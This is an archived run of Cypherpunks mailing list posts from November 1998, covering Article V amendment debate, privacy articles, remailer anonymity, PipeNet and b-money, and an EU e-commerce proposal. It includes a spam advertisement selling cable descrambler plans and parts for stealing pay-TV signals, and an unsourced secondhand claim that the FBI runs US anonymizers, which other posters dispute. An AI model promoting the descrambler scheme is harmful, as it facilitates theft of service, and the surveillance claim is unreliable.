>>> AOL administration spammed the Cypherpunks <cypherpunks@toad.com> list,
using
>>> an address for Cypherpunks which has been defunct for over a year now,
with:
>>>
>>> >Thank you for registering for Netscape AOL Instant Messenger!
>>> >
>>> >Your registration for screen name aohelsux has been received.
>>> >
>>> >Please reply to this message within 48 hours to complete
>>> >the registration process.  Simply reply to the present message
>>> >and type 'OK' as the text of your message.
>>>
>>> P.S. "Well they just responded to an address someone gave them," like
>>> certain advocates of AOL, lamers, and Microsoft we have on the list have
>>> said, is not an excuse. It's easy to set up domain validation. The
spammers
>>> just don't care.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Thu, 26 Nov 1998 08:54:36 +0800
To: Jim Choate <cypherpunks@Algebra.COM>
Subject: Re: How to reign the federal government in... (fwd)
In-Reply-To: <199811252222.QAA31143@einstein.ssz.com>
Message-ID: <365CAEA9.791CDC76@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Wed, 25 Nov 1998 22:53:06 +0000
> > From: "Douglas L. Peterson" <fnorky@chisp.net>
> > Subject: Re: How to reign the federal government in...
> 
> > As per Article V, two thirds of the States can call a Convention to
> > propose Amendments. I believe this would be 33 of our current 50 states.
> > Territories and other holding would have no say in this.  At this point,
> > if three fourths of the states agree to any proposed Amendments, it becomes
> > the law of the land.
> >
> > We only need two thirds of the States to start the process, but this
> > must be done by their Legislatures.
> 
> Which is exactly what I said. The goal of the party would be to get proposed
> amendments on the floor each state legislature for vote.
[snip]
> > > What is needed is a political party that has a representative site in each
> > > state capital. Their job is to get proposed amendments to the Constitution
> > > on the floor of each body for vote.
> >
> > Actually, it would not be to get the proposed amendments on the floor. You
> > would be putting the proposal for a Convention to amend the Constitution
> > on the floor.  In addition, depending on the State, the party would likely
> > need to have a member elected to that States Legislature.
> 
> Actualy it is. The Convention is only to create the amendment, the actual
> vote takes place in the state legislatures, not the convention.
> 

The actual vote takes place in the state legislatures AFTER the
convention.
The party would need to work for the convention or the proposed
amendments
would never get the the state legislatures.

-Doug
www.TheServerFarm.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Thu, 26 Nov 1998 08:53:40 +0800
To: Jim Choate <cypherpunks@Algebra.COM>
Subject: Re: Article V - an analysis
In-Reply-To: <199811252258.QAA31290@einstein.ssz.com>
Message-ID: <365CAF45.27B97897@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
>                                 ARTICLE V.
> 
>         [Constitution: how amended; proviso.]
[snip]

> The only sticky wicket I see is the ...proposed by Congress. Does this mean
> that Congress can decide which of the two it will recognize? Or does it mean
> that Congress can merely express its desire? Or does this apply only to the
> bills that were developed in the Congress? There's no time line for Congress
> to decide, could this be used to hinder such a process?

It seemed very clear to me that the "proposed by Congress" is refering
to any amendment proposed by Congress.

-Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas L. Peterson" <fnorky@chisp.net>
Date: Thu, 26 Nov 1998 09:48:30 +0800
To: Todd Larason <cypherpunks@Algebra.COM>
Subject: Re: Article V - an analysis (fwd)
In-Reply-To: <199811252328.RAA31856@einstein.ssz.com>
Message-ID: <365CBB46.34293003@chisp.net>
MIME-Version: 1.0
Content-Type: text/plain



Todd Larason wrote:
>> 
>> Why is this problematic? When the convention was called it was with the
>> express goal of replacing the articles. A tacit a priori admission they were
>> faulty and needed replacement.
>
>But that wasn't the goal, at least not the stated goal.  The Convention
>was called under the procedures specified in the Articles.  The Convention
>itself decided to change the rules for ratification.

If you look at the relevent section of the Articles of Confederation,
you will see this is not a problem.

The Articles of Confederation 
Article XIII.

Every State shall abide by the determinations of the United States
in Congress assembled, on all questions which by this Confederation
are submitted to them. And the Articles of this Confederation shall
be inviolably observed by every state, and the union shall be
perpetual; nor shall any alteration at any time hereafter be made
in any of them; unless such alteration be agreed to in a Congress
of the United States, and be afterwards confirmed by the legislatures
of every State.


The convention, the States, and the current Congress did as was
required under Article XIII.

-Doug
www.TheServerFarm.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BADJEEP97@aol.com
Date: Thu, 26 Nov 1998 18:17:43 +0800
Subject: CABLE  TV DESCRAMBLER........Now Only $7.00 !
Message-ID: <e1b00fb3.365d1662@aol.com>
MIME-Version: 1.0
Content-Type: text/plain




This is really cool!                    

              
            PREMIUM CHANNELS........Descrambled!              

                                         

EASY to assemble plans for only $7.00 !


YOU WILL BE WATCHING all your FAVORITE PAY STATIONS
featuring  MOVIES, SPORTS. Adult entertainment,
and any other scrambled signal NEXT WEEK!

You can EASILY assemble a cable descrambler in less than 30 minutes!
You have probably seen many advertisments for similar plans.........
BUT OURS are BETTER! 

We have compared it to all the others and have actually
IMPROVED the quality and SIMPLIFIED the design !!!


**  We even include PHOTOS! **


OUR PLANS ARE BETTER! 
We have NEW, EASY TO READ,EASY to assemble plans for only $7.00! 
We have seen them advertised for as much as $29.00 and you have 
to wait weeks to receive them!       


WHAT THE OTHERS SAY IS TRUE!

Parts are available at  "The TV HUT"  or any electronics store.  
Trademark rights do not allow us to use a national electronics 
retail chains' name but there is one in your town!  


Call and ask them BEFORE you order! 
They are very familiar with these plans! 
 


You will need these easy to obtain parts :

 270-235                        mini box
 271-1325                       2.2k ohm resistor 
 278-212                        chasis connectors
 RG59 coaxial cable             #12 copper wire 
 Variable capacitor


     They may have to  special order the variable capacitor,
     But WHY WAIT for a special order?  WE have them!


     WE have secured a supply of the capacitors directly from
     the manufacturer and We WILL include one with your plans
     for an ADDITIONAL  $10.00 only!
    

     All you need now is the EASY TO ASSEMBLE plans to
     show you how this educational device in 30 MINUTES! 

 It is LEGAL, providing of course you use these plans for 
 EDUCATIONAL PURPOSES only. See first hand and LEARN how this
 SIMPLE circuitry works! If you intend to use these plans for
 any other purpose DO NOT ORDER them.  
   

 IT'S FUN TO BUILD!  


We're sure you'll enjoy this project!                            
This is a unique opportunity for hobbiest of ANY skill level
to learn simple circuitry!


                Learn how easy descrambling is!           

                $ 7.00     for plans only                        
                
                $10.00     for variable capacitor only            

                $17.00     for The easy to assemble plans and one 
                            variable capacitor!	

                 


Please send check or money order payable to:           

Kraftworks
P.O. Box 11752
San Rafael, Ca.
94912         		            

WE pay postage and handling!          
Please allow 14 days for delivery.


This is a one time only mailing!  You have already 
been placed on our remove list and will not receive
another offer from us! 

Thank
You


























































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 27 Nov 1998 03:24:02 +0800
To: cypherpunks@cyberpass.net
Subject: enemy of the state movie
Message-ID: <199811261745.JAA08594@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



fun wired article on new movie "enemy of the state"
with privacy /cpunk implications. bamford quoted,
info on NSA, rotenberg, spy satellites, etc.

http://www.wired.com/news/news/culture/story/16507.html




happy xgiving folks
I am thankful for cyberspace
<g>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 27 Nov 1998 03:24:30 +0800
To: cypherpunks@cyberpass.net
Subject: old posts saved/archived/privacy article, salon
Message-ID: <199811261752.JAA08923@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



salon article on how old posts are saved on the net,
and how it affects privacy.  "I felt helpless and
violated" sez one poor hapless chic

http://www.salonmagazine.com/21st/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 27 Nov 1998 03:24:02 +0800
To: jd@well.com
Subject: salon article reply
Message-ID: <199811261801.KAA09463@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



dear Mr. Lasica:
your article is mostly fair and accurate but fails to 
delve into some obvious and basic issues.

1st, check out david brin's recent book on privacy.. you
cover only a tiny facet of the issues, of people that
argue privacy should be protected. consider a very interesting
alternative view..

2nd: it is easy to take any digital image of a naked woman
and paste the head of any other person on top of it, to the
point that it is indistiguishable from a real picture. tell
this to the mother of the daughter who's naked pictures were
posted.

3rd: you fail to mention anonymity/pseudonymity, the starkly obvious
solution to all the pseudo-problems you raise. your article
is fairly mild but reflects the constant refrain of journalists
to phrase every news story as some kind of looming or
scary crisis.

the issues you speak of have been debated among cpunks for
years with more insight. not expecting you to know abut cpunks,
but you coulda done a teeny better on that article.

a decent article nonetheless on important issues..

please purchase a few clues from the nearest cpunks and
try,try again.

take care




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: holist <holist@mail.matav.hu>
Date: Fri, 27 Nov 1998 03:28:48 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199811261817.KAA27682@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



I wonder if this is also old hat to you people. If it turns out to be
another FAQ, I promise to read some.

At a conference in Budapest yesterday (held by Network Associates) I was
interpreting for a certain professor Christoph Fischer, from Karlsruhe
University. He claimed to be a premier international hacker-hunter and
described several fascinating cases, such as industrial espionage performed
by the French secret service commissioned by French companies at Boeing and
Siemens (the latter resulting in a 6 billion Deutschmark railway contract
going to a French company rather than Siemens), as well as a case of
extortion in Germany, when someone he referred to as "some crazy person"
attempted to blackmail the German government by threatening to fly model
aircraft into the turbines of commercial jet aircraft at take-off, which, as
it turned out, is indeed a feasible means of causing a major disaster. 
The professor was called in by a panicky German government, about ready to
send off the cash, to try to locate "the crazy person".

The extortionist was sending the notes via e-mail, using what the professor
referred to as "e-mail anonymiser servers" in the US. "This is not too
widely publicised", he went on to say, "but all insiders are aware that all
e-mail anonymiser services in the U.S. are operated by the FBI." He went on
to say it took them about ten minutes to discover with the help of their
American friends which account the mail was originating from. A more serious
obstacle was posed by the fact that it was an AOL account and that the
subscriber had specified a bogus credit-card number generated by widely
available software for generating feasible bogus credit-card numbers, and
installed the internet applications from one of those AOL CD-ROMs that were
published in very large numbers. They were forced to begin monitoring some
30 thousand phonelines (another very interesting fact: according to the
professor, during the so-called "4+2" negotiations just before the Berlin
wall came down, the two Germanies agreed to provide the FBI with direct
access to the backbone of the German telephone network - consequently all
German telephone calls and a high percentage of all European international
calls, so they could listen in on those without even making an effort - in
fact, he claimed, it is easier for the FBI to listen to German phonecalls
than it is for the German authorities themselves), which, in addition to
costing a horrendous amount of money, resulted in a bunch of data every day
that took them two days to process. So, Fischer said, it would have been
hopeless if the fellow had not owed the German tax authority one and a half
million Marks - the tax authority busted him (following the lines of their
own, independent investigation), took his computer, and he was busted.


Quite a few of the messages to cypherpunks seem to come from anonymous
remailers in the US.


Comments?

holist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Fri, 27 Nov 1998 04:03:02 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: enemy of the state movie
In-Reply-To: <199811261745.JAA08594@netcom13.netcom.com>
Message-ID: <Pine.SOL.3.91.981126120904.18448A-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 26 Nov 1998, Vladimir Z. Nuri wrote:

> fun wired article on new movie "enemy of the state"
> with privacy /cpunk implications. bamford quoted,
> info on NSA, rotenberg, spy satellites, etc.
> 
> http://www.wired.com/news/news/culture/story/16507.html
> 

In this article Judy DeMocker writes....

    The scenario of an innocent man being digitally
    hounded through tunnel and building, traced to
    pay phones and 7-Eleven surveillance systems,
    and exposed by a digital trail of personal
    information, is overblown. Most store cameras are
    not hooked up to outside systems, and databases
    are not so rapidly accessible that a government
    agent could pull up a suspect's past addresses,
    personal history, bank, and telephone records in
    the blink of an eye. 

I don't know about pay phone tracing, though I imagine voice print
identification could be done.  Don't know what 7-eleven does with their
videocams other than record it onto video tape, but I can speak about the
databases... 

Pulling up a suspects past addresses, personal history, bank and telephone
records can be done very quickly. Past addresses and personal
history could be pulled very rapidly through credit agencies.  Mean income
level, kids, their ages, past employment etc.  I've seen this done in
about 20 or 30 seconds.  Bank records could probably be snatched from
FINCEN.  Telephone records might take a court order if done legally, but I
wouldn't put it past FBI or CIA to infiltrate telephone companies. CIA was
already found to be infiltrating the press when investigated by the Church
commission. What have they done since?

For those that have done background investigations on these agencies this
is a little like expecting to be shocked when told "sister smokes!"  For 
those that have been to busy to check or care it might come as a 
surprise.  For Wired it's inexcusable.  If they would be remove
just 5% of the hype and replace it with a little reality it might
be a lot for valuable.

Wired's editors need to pay a little bit more attention to detail.

That being said I haved enjoyed some of the articles, such as
those by Declan and Charles Platt.

A little less flourescent ink, a little more content.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Hillenbrand <JamezHill@Audiophile.com>
Date: Fri, 27 Nov 1998 04:23:06 +0800
To: cypherpunks@toad.com
Subject: Anon Mail Server?
Message-ID: <4.1.19981126144821.00944b80@pophost.suffolk.lib.ny.us>
MIME-Version: 1.0
Content-Type: text/plain



What is a good server that I could send mail through anonymously..

--


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      -------==== James Hillenbrand ====-------              
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
              ICQ NUMBER (UIN) : 7621556                           
     PERSONAL E-MAIL : JamezHill@Audiophile.com     
     ALT. E-MAIL : MegaHertz@Audiophile.com  
     HOMEPAGE : http://www.ThePentagon.com/DaMaGe 
     NOTES : Pumpin' BASS lower than you can hear 
             and louder than you can stand!  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 27 Nov 1998 08:07:43 +0800
To: cypherpunks@cyberpass.net
Subject: PipeNet 1.1 and b-money
Message-ID: <19981126153349.A12001@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



I've discovered some attacks against the original PipeNet design. The new
protocol, PipeNet 1.1, should fix the weaknesses. PipeNet 1.1 uses layered
sequence numbers and MACs. This prevents a collusion between a receiver
and a subset of switches from tracing the caller by modifying or swaping
packets and then watching for garbage.

A description of PipeNet 1.1 is available at
http://www.eskimo.com/~weidai.

Also available there is a description of b-money, a new protocol for
monetary exchange and contract enforcement for pseudonyms. 

Please direct all follow-up discussion of these protocols to cypherpunks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 27 Nov 1998 03:24:00 +0800
To: cypherpunks@toad.com
Subject: ATF funding voice recognition research
Message-ID: <199811261657.RAA16004@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




ATF - Proof of concept task - Prototype automated firearms licensing and
verification system which integrated voice recognition and reverse voice
recognition, telecommunication, Internet to query ATF database across LANs
and WANs 

http://www.0-1.com/y_ats.htm

The company doing the research seems to be a beltway-bandit
("minority owned" mil-welfare) type place.

They're also evaluating sniffers for DISA...



	"Semtex --better than duct tape"












  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Moyzis <smoyzis@ameritech.net>
Date: Fri, 27 Nov 1998 08:26:32 +0800
To: cypherpunks@cyberpass.net
Subject: PipeNet 1.1 and b-money
Message-ID: <3.0.1.16.19981126175936.4c4f8cc2@mailhost.chi.ameritech.net>
MIME-Version: 1.0
Content-Type: text/plain



I don't know if this was supposed to have gone to Bugtraq, or it came to me
because I 'visited' their "snoop server" acoupla times.  If you already rec'd
the original, then "Never Mind".

>Date: Thu, 26 Nov 1998 15:33:49 -0800
>From: Wei Dai <weidai@eskimo.com>
>To: cypherpunks@cyberpass.net
>Cc: onions@itd.nrl.navy.mil
>Subject: PipeNet 1.1 and b-money
>Sender: owner-onions@itd.nrl.navy.mil
>
>I've discovered some attacks against the original PipeNet design. The new
>protocol, PipeNet 1.1, should fix the weaknesses. PipeNet 1.1 uses layered
>sequence numbers and MACs. This prevents a collusion between a receiver
>and a subset of switches from tracing the caller by modifying or swaping
>packets and then watching for garbage.
>
>A description of PipeNet 1.1 is available at
>http://www.eskimo.com/~weidai.
>
>Also available there is a description of b-money, a new protocol for
>monetary exchange and contract enforcement for pseudonyms. 
>
>Please direct all follow-up discussion of these protocols to cypherpunks.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 28 Nov 1998 10:30:09 +0800
To: holist <cypherpunks@toad.com
Subject: Re: bogus Hungarian disinformation.
In-Reply-To: <199811261817.KAA27682@toad.com>
Message-ID: <3.0.5.32.19981126220233.008f83d0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:17 AM 11/26/98 -0800, holist wrote:
>I wonder if this is also old hat to you people. If it turns out to be
>another FAQ, I promise to read some.
> [Bogus saga deleted, about extortionist using anonymizers threatening
> the German government, and claiming the FBI runs the anonymizers.]

I haven't _seen_ Lance Cottrell's NSA ID badge, but many of the hard-core 
cypherpunks have them - it's amazing how official things look when they're 
laminated in plastic!  Even the one with Hugh Daniel in a tie... 

Anonymizers don't do very well for extortion yet.
Sending the anonymous message is the easy part - paper mail is much
better at anonymity, since there's much more of it, and the default
collection methods in most countries are anonymous.

Then you've got to get the targets to READ email - some do, some don't.
Email to most politicians is like paper mail to most of them - 
gets sorted by the pound, and if there's money attached you'll
get a thank-you note.

It's collecting the ransom money that's hard - without Digicash,
there's no good anonymous payment mechanism.  

>Quite a few of the messages to cypherpunks seem to come from anonymous
>remailers in the US.

I usually post anonymous postings from the Netherlands, myself.
It simplifies jurisdictional questions.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 28 Nov 1998 10:37:24 +0800
To: cypherpunks@cyberpass.net
Subject: European Commission proposal on legal framework for e-commerce
Message-ID: <3.0.5.32.19981126234500.008f8af0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded from cyberia-l -- The EU's latest attempts to
make electronic commerce convenient while ensuring tax collection
and preventing collapse of governments :-)

========= ====
]] THe text of the new draft is not on line yet, but will probably appear at
]] http://europa.eu.int/comm/dg15/en/index.htm  in the next few days (there is
]] a what's new button on the left hand bar)

>>> Should be on line on Nov 23rd
} Another URL to remember to get acces to european documents 
} concerning Internet law is :
} http://www2.echo.lu/legal/en/labhome.html  and for "what's new :
} http://www2.echo.lu/legal/en/labnew.html

===============

http://europa.eu.int/rapid/start/cgi/guesten.ksh?p_action.gettxt=gt&doc=IP/98/999|0|RAPID&lg=EN

IP/98/999

Brussels, 18 November 1998

Electronic commerce: Commission proposes legal framework

A proposal for a Directive to establish a coherent legal framework for the
development of electronic commerce within the Single Market has been put
forward by the European Commission. The proposed Directive would ensure
that information society services benefit from the Single Market principles
of free movement of services and freedom of establishment and could provide
their services throughout the European Union (EU) if they comply with the
law in their country of origin. Such services are defined as those provided
normally against remuneration, at a distance, by electronic means and in
response to the individual request of a customer. The proposed Directive
would establish specific harmonised rules only in those areas strictly
necessary to ensure that businesses and citizens could supply and receive
information society services throughout the EU, irrespective of frontiers.
These areas include definition of where operators are established,
electronic contracts, liability of intermediaries, dispute settlement and
role of national authorities. In other areas the Directive would build on
existing EU instruments which provide for harmonisation or on mutual
recognition of national laws. The Directive would apply only to service
providers established within the EU and not those established outside.

"The Single Market's legal framework, combined with the single currency,
provide the European Union with a unique opportunity to facilitate the
development of electronic commerce", commented Single Market Commissioner
Mario Monti. "Electronic commerce adds a new dimension to the Single Market
for consumers in terms of easier access to goods and services of better
quality and at lower prices. Electronic commerce will promote trade,
stimulate innovation and competitiveness and create sustainable jobs. This
proposal should ensure that the Union reaps the full benefits of electronic
commerce by boosting consumer confidence and giving operators legal
certainty, without excessive red tape."

The global electronic commerce market is growing extremely fast and could
be worth ECU 200 billion by the year 2000. Worldwide, 86 million people
were connected to the Internet by the end of 1996 and by 2000, this is
expected to reach 250 million individuals. Within the EU, it is estimated
that more than 400,000 jobs related to the information society were created
between 1995 and 1997 and that one in four news jobs is derived from these
activities.

Scope

The proposal for a Directive, which was foreseen in the Commission's April
1997 electronic commerce Communication (see IP/97/313), covers all
information society services, both business to business and business to
consumer services, including services provided free of charge to the
recipient e.g. funded by advertising or sponsorship revenue and services
allowing for on-line electronic transactions such as interactive
teleshopping of goods and services and on-line shopping malls. Examples of
sectors and activities covered include on-line newspapers, on-line
data-bases, on-line financial services, on-line professional services (such
as lawyers, doctors, accountants, estate agents), on-line entertainment
services such as video on demand, on-line direct marketing and advertising
and services providing access to the World Wide Web.

Establishment/supervision/transparency

The proposal would define the place of establishment as the place where an
operator actually pursues an economic activity through a fixed
establishment, irrespective of where websites or servers are situated or
where the operator may have a mail box. This definition is in line with the
principles established by the EU Treaty (Article 52) and the case law of
the European Court of Justice. Such a definition would remove current legal
uncertainty and ensure that operators could not evade supervision, as they
would be subject to supervision in the Member State where they were
established. The proposal would prohibit Member States from imposing
special authorisation schemes for information society services which are
not applied to the same services provided by other means. It would also
require Member States to oblige information society service providers to
make available to customers and competent authorities in an easily
accessible and permanent form basic information concerning their activities
(name, address, e-mail address, trade register number, professional
authorisation and membership of professional bodies where applicable, VAT
number).

On-line contracts

For electronic commerce to develop its full potential, it must be possible
for contracts to be concluded on-line unrestricted by inappropriate rules
(such as a requirement that contracts be drawn up on paper). The proposal
would therefore oblige Member States to adjust their national legislation
to remove any prohibitions or restrictions on the use of electronic media
for concluding contracts. In addition, the proposal would ensure legal
security by clarifying in certain cases the moment of conclusion of the
contract, whilst fully respecting contractual freedom. These provisions
would complement the proposal for a Directive on electronic signatures (see
IP/98/423).

Liability of intermediaries

To facilitate electronic commerce, it is necessary to clarify the
responsibility of on-line service providers for transmitting and storing
information from third party (i.e. when service providers act as
"intermediaries").

To eliminate existing legal uncertainties and to avoid divergent approaches
at Member State level, the proposal would establish an exemption from
liability for intermediaries where they play a passive role as a "mere
conduit" of information from third parties and limit service providers'
liability for other "intermediary" activities such as the storage of
information. The proposal strikes a careful balance between the different
interests involved in order to stimulate co-operation between different
parties and so reduce the risk of illegal activity on-line.

Commercial communications

Commercial communications such as advertising and direct marketing, which
are an essential part of most electronic commerce services, would be
subject to clearly defined rules under the proposed Directive. The proposal
defines what constitutes a commercial communication and makes it subject to
certain transparency requirements to ensure consumer confidence and fair
trading. In order to allow consumers to react more readily to harmful
intrusion, the proposal requires that commercial communications by e-mail
are clearly identifiable. In addition, for regulated professions (such as
lawyers or accountants), the proposal lays down the general principle that
the on-line provision of services is permitted and that national rules on
advertising shall not prevent professions from operating Web-sites.
However, these would have to respect certain rules of professional ethics
which should be reflected in codes of conduct to be drawn up by
professional associations.

Implementation

Rather than inventing new rules, the proposal would seek to ensure that
existing EU and national legislation were effectively enforced. The
development of a genuine Single Market based on mutual confidence between
Member States - is stimulated by strengthening enforcement mechanisms. The
proposal would seek to do so by encouraging the development of codes of
conduct at EU level, by stimulating administrative co-operation between
Member States and by facilitating the setting up of effective, alternative
cross-border dispute settlement systems. The proposal would also require
Member States to provide for fast, efficient legal redress appropriate to
the on-line environment and to ensure that sanctions for violations of the
rules established under the Directive were effective, proportionate and
dissuasive.

Mutual recognition/derogations

The proposed Directive would clarify that the Single Market principle of
mutual recognition of national laws and the principle of control in the
country of origin must be applied to information society services so that
such services provided from another Member State are not restricted for
reasons falling within the scope of the proposal which would not cover
taxation, personal data (the free movement of which is covered by Directive
95/46 see IP/98/925), the activities of notaries, representation and
defence of clients before a court, gambling activities. Furthermore, the
proposed Directive would not interfere with the application of the Brussels
Convention on jurisdiction, recognition and enforcement of judgements in
civil and commercial matters and the Rome Convention on the law applicable
to contractual obligations.

The proposed Directive would also allow Member States on a case by case
basis to impose restrictions on information society services supplied from
another Member State if necessary to protect the public interest on grounds
of protection of minors, the fight against hatred on grounds of race, sex,
religion or nationality, public health or security and consumer protection.
However, such restrictions would have to be proportionate to their stated
objective. Moreover, such restrictions could only be imposed (except in
cases of urgency) after:

*  the Member State where the service provider was established had been
asked to take adequate measures and failed to do so and
*  the intention to impose restrictions had been notified in advance to the
Commission and to the Member State where the service provider was
established.
In cases of urgency, the reasons for the restrictions (and the urgency)
would have to be notified in the shortest possible time to the Commission
and to the Member State of the service provider. Where the Commission
considered proposed or actual restrictions were not justified, Member
States would be required to refrain from imposing them or urgently put an
end to them.

The proposal for a Directive on a legal framework for electronic commerce
will be forwarded to the European Parliament and the EU's Council of
Ministers for adoption under the co-decision procedure.


==========================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 28 Nov 1998 10:18:25 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: Article V - an analysis (fwd)
In-Reply-To: <199811252328.RAA31856@einstein.ssz.com>
Message-ID: <3.0.5.32.19981127000007.008f8af0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:34 PM 11/25/98 -0800, Todd Larason wrote:
>On 981125, Jim Choate wrote:
>> If Congress
>> sits around and does nothing can it stall long enough that they can kill the
>> amendment process by their own internal procedures? 
>
>There's only a time limit because Congress has started specifying one, in the
>same resolution which proposes the amendment and specifies the ratification
>method.  (Exception: in the case of the ERA, I believe they later extended the
>limit).  The power to specify a time limit isn't mentioned in the Constitution 
>as you note, but has also never been tested.

The most recent amendment (27th?) sat around for nearly 200 years
before 3/4 of the states ratified it,  (preventing Congress from 
raising their salaries during their current term.)  
The power to specify a time limit doesn't need separate mention; 
the time limit is either part of the proposed amendment, or it isn't, 
and it's part of the negotiations for getting Congress to pass it.

The more dangerous problem is that people keep suggesting a 
Constitutional Convention, which has basically no limits on its scope
(especially given the one previous precedent, which substantially
increased Federal power beyond the limits of the Articles,
and didn't require unanimous consent to adopt its product,
though the Articles required it for changing them.)
Even if the states _say_ they're limiting their delegation to
specific tasks, that doesn't mean the ConCon won't exceed them,
and if it gets sufficient media/public support, it can get away with it.

Don't expect the 2nd, 9th, or 10th amendments to survive a ConCon at all,
or the 1st to have any meaning resembling its current limited one,
or the 4th or 5th to get by without "except for drugs or other
politically incorrect substances" attached to it, or the 
definitions of rights or powers to resemble what you want.

(There have been some Libertarian proposals to add
"and this time we mean it" to the end of the 9th and 10th,
or to add a period after the 1st's "Congress shall make no law",
but they're not in keeping with the spirit of the age :-)

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 27 Nov 1998 10:19:38 +0800
To: cypherpunks@Algebra.COM
Subject: Rootfest
Message-ID: <199811270149.CAA30480@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



http://slashdot.org/articles/98/11/26/1841245.shtml

"RootFest is a conference for the computer underground,
as well as the computer security professionals,
engineers, networking people, feds, script kiddies, and
anyone else who would like a chance to meet people and
learn. When: RootFest 99 will be held May 21-23, 1999.
Where: Minneapolis, Minnesota,..."

RootMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Fri, 27 Nov 1998 19:19:41 +0800
To: cypherpunks@cyberpass.net
Subject: Evil Bandwidth Plot Exposed
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F85CB@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



We're still getting clueless people forwarding us email virus hoaxes.
Pen-Pal, Buddy Frogs, Good Times, whatever.

And I just realised who has to be responsible!  Who has a motive for this
"crime"?  These things do no-one any real harm, they just take up
bandwidth.  Networks get saturated and maybe we have to buy more kit. It
must be the router manufacturers. Maybe there is a secret team at Cisco or
IBM generating new  hoaxes  to keep the email market growing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 27 Nov 1998 12:58:34 +0800
To: cypherpunks@toad.com
Subject: Re: Old Hat
Message-ID: <199811270421.FAA13900@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On the morning of Thurs, 26-Nov-98 at 10:17:48 -0800, holist 
unwisely said:

> "This is not too widely publicised", he went on to say, 
> "but all insiders are aware that all e-mail anonymiser 
> services in the U.S. are operated by the FBI."

> Quite a few of the messages to cypherpunks seem to come 
> from anonymous remailers in the US.
> 
> Comments?

Comment? COMMENTS? How about this, FUDSpreaderBreath: Stick
Fischer and his claims up your ass.

This is not too widely publicised <whisper, whisper>, I 
went on to say, but all insiders are aware that this kind 
of FUD is unadulterated ratshit. While there is no doubt
_some_ official presence in the remailer network, the
proposition advanced here is preposterous.

> He went on to say it took them about ten minutes to 
> discover with the help of their American friends which 
> account the mail was originating from.

It would probably take more than ten minutes just to find
the phone number of their FBI contact, much less find him
at his desk and not humping some summer intern, much less 
expect that he would know a remailer from his no doubt 
ultra-tight asshole, much less have him run down the 
pointy-haired manager to give him permission to find and 
communicate with a suitably cleared propellor head, much 
less find that the remailer in question was, indeed, 
operated either by them or by their snaky friends over at 
the NSA, much less check their surreptitious logs for the 
offending traffic, much less find that that traffic indeed 
did not originate from another remailer _not_ under their 
control, etc. etc.

Ten minutes, in bureaucrat time, is about what it takes
to rub two brain cells together to make a realistic 
approximation of a human thought. By this time, action
in the physical universe is still a long, long way off.

This report is likely to be nothing more than a complete
